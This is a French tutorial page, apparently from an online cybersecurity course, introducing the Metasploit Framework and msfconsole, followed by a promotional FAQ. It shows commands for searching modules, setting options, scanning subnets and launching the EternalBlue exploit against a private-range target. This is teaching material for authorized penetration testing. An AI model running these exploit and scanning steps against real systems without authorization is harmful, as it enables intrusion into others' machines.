Architecture de Metasploit et msfconsole
Apprenez à utiliser msfconsole, comprenez la structure des exploits, des charges utiles et des modules, puis configurez les options.
Architecture de Metasploit et msfconsole est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 1 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu’est-ce que Metasploit ?
Metasploit Framework est une plateforme libre de test d’intrusion qui fournit une interface unifiée pour développer, évaluer et exécuter des codes d’exploitation. Il s’agit de l’outil de référence du secteur pour l’exploitation autorisée dans les environnements de laboratoire.
Composants de Metasploit
Principaux composants : msfconsole (CLI interactive), msfvenom (générateur de charges utiles), base de données Metasploit (PostgreSQL pour stocker les hôtes et les sessions) et Armitage (interface frontale GUI).
Démarrer msfconsole
Lancez msfconsole et initialisez la base de données. L’invite devient msf6 >. L’auto-complétion avec la touche de tabulation fonctionne pour toutes les commandes, les noms de modules et les options.
# Start msfconsole
msfconsole
# Initialize database (if needed)
msfdb init
msfdb start
# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.Types de modules
Metasploit organise ses fonctionnalités en types de modules : exploitation (code d’attaque spécifique à une vulnérabilité), charge utile (code qui s’exécute après l’exploitation), auxiliaire (analyseurs et générateurs de données aléatoires), après-exploitation, encodeur et aucune opération.
msf6 > show exploits # list exploit modules
msf6 > show auxiliary # list auxiliary modules
msf6 > show payloads # list payloads
msf6 > show post # post-exploitation modulesRechercher des modules
La commande search filtre les modules par nom, CVE, plateforme ou classement. Le classement d’un module indique sa fiabilité : Excellent > Très bon > Bon > Normal > Moyen > Faible.
msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17Utiliser un module d’exploitation
Sélectionnez un module avec use, affichez les options requises avec show options, définissez les valeurs avec set, puis lancez-le avec run ou exploit.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > runDéfinir des options globales
setg définit des options globalement pour tous les modules suivants : cette commande est utile pour LHOST, LPORT et RHOSTS lorsqu’ils restent constants pendant toute une mission.
msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444
# Unset global
msf6 > unsetg LHOSTModules auxiliaires
Les modules auxiliaires effectuent des analyses, du recensement et de la génération de données aléatoires sans fournir de charges utiles. Exemples : analyseur de version SMB, force brute des connexions SSH et analyseur de répertoires HTTP.
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > runGestion des espaces de travail
Les espaces de travail organisent les données d’analyse et les sessions pour chaque mission. Créez un nouvel espace de travail au début de chaque évaluation afin de conserver les données séparées.
msf6 > workspace # list workspaces
msf6 > workspace -a lab_test # create
msf6 > workspace lab_test # switch
msf6 > hosts # show discovered hosts
msf6 > services # show discovered servicesIntégration de Nmap
Importez directement les résultats d’analyse XML de Nmap dans la base de données de Metasploit afin de remplir les tables des hôtes et des services, ce qui permet de sélectionner des modules ciblés.
msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445Aide et documentation
Chaque module possède une documentation intégrée. Utilisez info pour lire la description du module, son niveau de fiabilité, ses références (CVE et avis de sécurité) ainsi que ses options requises.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
# Shows: description, CVE references,
# platform, architecture, reliability rankVérification rapide
Quelle commande sélectionne un module dans msfconsole ?
Résumé : architecture de Metasploit
msfconsole est le centre névralgique : recherchez des modules, définissez des options, exécutez des codes d’exploitation et gérez des sessions. Travaillez toujours dans un espace de travail nommé, importez les résultats de Nmap pour remplir la base de données et consultez les informations du module avant toute exécution : comprenez ce que vous exécutez et pourquoi.
Questions Fréquemment Posées
La leçon « Architecture de Metasploit et msfconsole » est-elle gratuite ?
Oui — le texte complet de « Architecture de Metasploit et msfconsole » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Architecture de Metasploit et msfconsole » ?
Apprenez à utiliser msfconsole, comprenez la structure des exploits, des charges utiles et des modules, puis configurez les options. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?
Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 1 sur 4.
Combien de temps prend la leçon « Architecture de Metasploit et msfconsole » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?
Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Architecture de Metasploit et msfconsole
- Exploiter une vulnérabilité connue
- Charges utiles : avec ou sans étapes, Meterpreter
- Après l’exploitation : pivoter et persister